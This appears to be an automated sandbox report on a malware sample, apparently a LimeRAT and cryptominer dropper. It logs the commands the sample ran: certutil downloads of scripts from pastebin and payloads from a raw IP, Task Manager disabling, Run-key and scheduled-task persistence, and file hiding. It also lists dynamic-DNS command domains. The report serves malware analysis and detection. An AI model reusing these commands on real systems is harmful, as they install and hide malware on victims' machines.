Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 2, 2022, 8:56 a.m. | May 2, 2022, 8:58 a.m. |
-
-
-
cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
3068-
certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/GUqDzHQW C:\Users\test22\AppData\Local\Temp\version.bat
2156 -
certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/h6SvjTQp C:\Users\test22\AppData\Local\Temp\hosting.bat
2276 -
certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/DVn2TV4Q C:\Users\test22\AppData\Local\Temp\versioncd.bat
196 -
cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\hosting.bat"
2608 -
cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\version.bat"
2740 -
cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\versioncd.bat"
2976 -
WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
2896 -
WMIC.exe wmic process where name='taskmgr.exe' delete
1664 -
WMIC.exe wmic process where name='Taskmgr.exe' delete
2264 -
WMIC.exe wmic process where name='xmrig.exe' delete
2296 -
reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2456 -
reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
204 -
reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
1756 -
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\z.vbs"
2568-
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\z.vbs"
192
-
-
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\helps.vbs"
2860-
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\helps.vbs"
2840
-
-
-
schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe'"
2828 -
winlogins.exe "C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe"
2256
-
-
xcopy.exe xcopy /y "C:\Users\test22\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\test22\AppData\Roaming\AppData\Windows Updates"
3056 -
attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\*.*"
1660 -
attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates"
2104 -
attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector\*.*"
2416 -
attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector"
792 -
attrib.exe attrib -s -h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
2212 -
xcopy.exe xcopy /y "C:\Users\test22\AppData\Local\Temp\updateW\Microsoft.com" "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
2604 -
attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
2916 -
WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
2352 -
attrib.exe attrib -s -h "C:\Windows (x86)\*.*"
2632 -
certutil.exe certutil -urlcache -split -f "http://54.254.238.33/xm/win.com" C:\Users\test22\AppData\Local\Temp\updateW\win.com
2940 -
certutil.exe certutil -urlcache -split -f "http://54.254.238.33/xm/64a1.com" C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
3232 -
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe""
4008-
certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/GUqDzHQW "C:\Windows (x86)\version.bat"
176 -
cmd.exe cmd /c del "C:\Windows (x86)\version.bat"
3244 -
cmd.exe C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
2320-
WMIC.exe wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
3532
-
-
-
-
WMIC.exe wmic process where name='xagal.exe' delete
2328 -
explorer.exe "C:\Windows (x86)\explorer.exe"
3836 -
cmd.exe cmd /c del "C:\Windows (x86)\xcls.bat"
1968
-
-
-
-
-
-
win.com "C:\Users\test22\AppData\Local\Temp\updateW\win.com"
3648 -
PING.EXE ping 127.0.0.1 -n 5
3848 -
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\runx.vbs"
296-
-
WMIC.exe wmic process where name='windowsapp.exe' delete
2072
-
-
-
-
-
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49167 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49174 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49175 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49168 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49170 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49172 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49224 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49239 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLSv1 192.168.56.101:49244 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd |
TLS 1.3 192.168.56.101:49274 131.153.76.130:80 |
None | None | None |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
pdb_path | D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb |
section | .gfids |
resource name | PNG |
suspicious_features | Connection to IP address | suspicious_request | GET http://54.254.238.33/xm/win.com | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://54.254.238.33/xm/64a1.com | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://pastebin.com/raw/nEZ87Pwx |
domain | niogem1171.ddns.net |
domain | muslada2251.ddns.net |
domain | rinot972.ddns.net |
domain | marena9201.ddns.net |
domain | muslada2251.myvnc.com |
domain | niogem1171.myvnc.com |
domain | muslada2251.servebeer.com |
domain | niogem1171.servebeer.com |
domain | niogem1171.serveminecraft.net |
domain | muslada2251.serveminecraft.net |
domain | muslada2251.serveblog.net |
domain | niogem1171.serveblog.net |
domain | niogem1171.servecounterstrike.com |
domain | muslada2251.servecounterstrike.com |
domain | muslada2251.servehttp.com |
domain | niogem1171.servehttp.com |
domain | marena9201.bounceme.net |
domain | niogem1171.bounceme.net |
domain | muslada2251.bounceme.net |
domain | muslada2251.servequake.com |
domain | niogem1171.servequake.com |
domain | marena9201.3utilities.com |
domain | niogem1171.3utilities.com |
domain | muslada2251.3utilities.com |
domain | muslada2251.redirectme.net |
domain | niogem1171.redirectme.net |
domain | muslada2251.servehalflife.com |
domain | niogem1171.servehalflife.com |
domain | niogem1171.zapto.org |
domain | muslada2251.zapto.org |
domain | muslada2251.hopto.org |
domain | niogem1171.hopto.org |
domain | muslada2251.sytes.net |
domain | niogem1171.sytes.net |
domain | niogem1171.serveftp.com |
domain | muslada2251.serveftp.com |
domain | niogem1171.servemp3.com |
domain | muslada2251.servemp3.com |
domain | muslada2251.myftp.org |
domain | muslada2251.myftp.biz |
domain | niogem1171.myftp.biz |
domain | niogem1171.myftp.org |
domain | niogem1171.servegame.com |
domain | muslada2251.servegame.com |
domain | rinot972.ddnsking.com |
domain | niogem1171.ddnsking.com |
domain | marena9201.ddnsking.com |
domain | muslada2251.ddnsking.com |
request | GET http://54.254.238.33/xm/win.com |
request | GET http://54.254.238.33/xm/64a1.com |
request | GET https://pastebin.com/raw/GUqDzHQW |
request | GET https://pastebin.com/raw/h6SvjTQp |
request | GET https://pastebin.com/raw/DVn2TV4Q |
request | GET https://pastebin.com/raw/nEZ87Pwx |
description | wscript.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds | |||
description | winlogins.exe tried to sleep 219 seconds, actually delayed analysis time by 219 seconds |
file | C:\Windows (x86)\KBDMLT48.DLL |
file | C:\Windows (x86)\KBDBE.DLL |
file | C:\Windows (x86)\KBDCZ1.DLL |
file | C:\Windows (x86)\TRACERT.EXE |
file | C:\Windows (x86)\KBDLT.DLL |
file | C:\Users\test22\AppData\Local\Temp\versioncd.bat |
file | C:\Windows (x86)\KBDMYAN.DLL |
file | C:\Windows (x86)\KBDAZST.DLL |
file | C:\Windows (x86)\KBDNTL.DLL |
file | C:\Windows (x86)\KBDA2.DLL |
file | C:\Windows (x86)\KBDBENE.DLL |
file | C:\Windows (x86)\icmp.dll |
file | C:\Windows (x86)\KBDINDEV.DLL |
file | C:\Windows (x86)\asferror.dll |
file | C:\Windows (x86)\kbdgeoer.dll |
file | C:\Windows (x86)\KBDPASH.DLL |
file | C:\Windows (x86)\KBDBR.DLL |
file | C:\Windows (x86)\tier2punctuations.dll |
file | C:\Windows (x86)\KBDINTAM.DLL |
file | C:\Windows (x86)\KBDMONST.DLL |
file | C:\Users\test22\AppData\Local\Temp\hosting.bat |
file | C:\Windows (x86)\KBDHU.DLL |
file | C:\Windows (x86)\KBDSMSFI.DLL |
file | C:\Windows (x86)\KBDUKX.DLL |
file | C:\Windows (x86)\kbdax2.dll |
file | C:\Windows (x86)\KBDFR.DLL |
file | C:\Windows (x86)\KBDYCC.DLL |
file | C:\Windows (x86)\KBDINBE1.DLL |
file | C:\Windows (x86)\kbd101a.dll |
file | C:\Windows (x86)\KBDTUF.DLL |
file | C:\Windows (x86)\KBDBLR.DLL |
file | C:\Windows (x86)\KBDTUQ.DLL |
file | C:\Windows (x86)\KBDFTHRK.DLL |
file | C:\Windows (x86)\KBDIBO.DLL |
file | C:\Windows (x86)\kbd106.dll |
file | C:\Windows (x86)\KBDLT2.DLL |
file | C:\Users\test22\AppData\Local\Temp\version.bat |
file | C:\Windows (x86)\KBDTH3.DLL |
file | C:\Windows (x86)\KBDIT142.DLL |
file | C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe |
file | C:\Windows (x86)\KBDSL1.DLL |
file | C:\Windows (x86)\KBDRU.DLL |
file | C:\Windows (x86)\KBDUSL.DLL |
file | C:\Windows (x86)\KBDJAV.DLL |
file | C:\Windows (x86)\KBDMACST.DLL |
file | C:\Windows (x86)\KBDINASA.DLL |
file | C:\Windows (x86)\KBDDV.DLL |
file | C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat |
file | C:\Windows (x86)\kbdgeoqw.dll |
file | C:\Windows (x86)\KBDMAORI.DLL |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk |
cmdline | wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list |
cmdline | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe" |
cmdline | wmic process where name='windowsapp.exe' delete |
cmdline | schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe'" |
cmdline | wmic csproduct get UUID /format:list |
cmdline | wmic process where name='taskmgr.exe' delete |
cmdline | wmic process where name='xmrig.exe' delete |
cmdline | wmic process where name='Taskmgr.exe' delete |
cmdline | C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "=" |
cmdline | wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe"" |
cmdline | wmic process where name='xagal.exe' delete |
cmdline | C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list |
file | C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe |
file | C:\Users\test22\AppData\Local\Temp\updateW\winlogins.exe |
file | C:\Users\test22\AppData\Local\Temp\updateW\64a1.com |
file | C:\Users\test22\AppData\Local\Temp\updateW\win.com |
file | C:\Users\test22\AppData\Local\Temp\updateW\runx.vbs |
file | C:\Windows (x86)\xagal.exe |
file | C:\Windows (x86)\run.vbs |
file | C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat |
file | C:\Windows (x86)\xcls.bat |
file | C:\Windows (x86)\explorer.exe |
file | C:\Users\test22\AppData\Local\Temp\updateW\64a1.com |
file | C:\Users\test22\AppData\Local\Temp\updateW\csrss.exe |
file | C:\Users\test22\AppData\Local\Temp\updateW\win.com |
file | C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe |
file | C:\Users\test22\AppData\Local\Temp\updateW\winlogins.exe |
file | C:\Users\test22\AppData\Local\Temp\IE.exe |